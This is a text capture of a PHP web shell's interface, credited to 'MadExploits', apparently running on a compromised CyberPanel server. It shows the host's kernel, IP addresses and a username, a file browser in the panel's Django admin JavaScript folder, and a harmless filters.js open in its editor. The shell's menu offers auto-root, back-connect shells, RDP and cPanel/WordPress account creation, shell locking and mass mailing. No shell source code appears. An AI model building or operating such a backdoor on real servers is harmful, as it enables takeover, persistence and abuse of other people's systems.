Linux cyberpanel 5.15.0-156-generic #166-Ubuntu SMP Sat Aug 9 00:02:46 UTC 2025 x86_64
LiteSpeed
: 160.191.175.3 | : 216.73.216.114
Cant Read [ /etc/named.conf ]
8.2.29
aodai6801
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
local /
CyberCP /
public /
static /
admin /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
SelectBox.js
4.42
KB
-rw-r--r--
SelectFilter2.js
14.93
KB
-rw-r--r--
actions.js
7.69
KB
-rw-r--r--
autocomplete.js
1.04
KB
-rw-r--r--
calendar.js
8.27
KB
-rw-r--r--
cancel.js
884
B
-rw-r--r--
change_form.js
606
B
-rw-r--r--
collapse.js
1.76
KB
-rw-r--r--
core.js
5.55
KB
-rw-r--r--
filters.js
978
B
-rw-r--r--
inlines.js
15.16
KB
-rw-r--r--
jquery.init.js
347
B
-rw-r--r--
nav_sidebar.js
2.99
KB
-rw-r--r--
popup_response.js
551
B
-rw-r--r--
prepopulate.js
1.5
KB
-rw-r--r--
prepopulate_init.js
586
B
-rw-r--r--
theme.js
1.9
KB
-rw-r--r--
urlify.js
7.7
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : filters.js
/** * Persist changelist filters state (collapsed/expanded). */ 'use strict'; { // Init filters. let filters = JSON.parse(sessionStorage.getItem('django.admin.filtersState')); if (!filters) { filters = {}; } Object.entries(filters).forEach(([key, value]) => { const detailElement = document.querySelector(`[data-filter-title='${CSS.escape(key)}']`); // Check if the filter is present, it could be from other view. if (detailElement) { value ? detailElement.setAttribute('open', '') : detailElement.removeAttribute('open'); } }); // Save filter state when clicks. const details = document.querySelectorAll('details'); details.forEach(detail => { detail.addEventListener('toggle', event => { filters[`${event.target.dataset.filterTitle}`] = detail.open; sessionStorage.setItem('django.admin.filtersState', JSON.stringify(filters)); }); }); }
Close